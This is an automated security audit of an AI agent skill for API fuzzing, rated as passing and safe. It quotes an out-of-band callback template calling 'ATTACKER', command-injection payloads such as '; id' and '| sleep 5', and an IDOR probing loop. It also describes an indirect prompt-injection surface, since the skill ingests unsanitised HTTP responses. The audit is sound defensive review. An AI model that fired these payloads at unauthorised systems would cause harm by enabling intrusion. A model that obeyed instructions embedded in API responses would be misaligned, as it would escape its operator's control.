api-semantic-fuzz
Pass
Audited by Gen Agent Trust Hub on Mar 31, 2026
Risk Level: SAFECOMMAND_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides bash scripts that utilize standard system utilities like
curl,wc, andseqto automate API discovery tasks. These scripts perform baseline measurement, parameter probing, and automated IDOR validation loops. - [EXTERNAL_DOWNLOADS]: The skill initiates network communication with external API endpoints to perform semantic analysis and fuzzing operations.
- [DATA_EXFILTRATION]: Performs network operations targeting user-defined URLs. It includes reference templates for out-of-band (OOB) testing, such as
curl http://ATTACKER/, which is a standard security testing technique used to confirm vulnerabilities on a remote target. - [REMOTE_CODE_EXECUTION]: Includes a reference catalog of command injection payloads (e.g.,
; id,| sleep 5) designed for testing external systems. These strings are documented as fuzzing vectors and are not intended for local execution by the agent. - [PROMPT_INJECTION]: The skill analyzes responses from external APIs to detect vulnerabilities, which introduces a surface for indirect prompt injection if a malicious target returns adversarial instructions.
- Ingestion points: Raw HTTP response bodies and headers retrieved via
curlinSKILL.mdphases 2 and 3. - Boundary markers: None identified; the skill methodology focuses on interpreting raw response data.
- Capability inventory: Ability to execute shell commands (
bash) and perform network requests (curl). - Sanitization: No explicit sanitization or validation of the untrusted API response content is defined.
Audit Metadata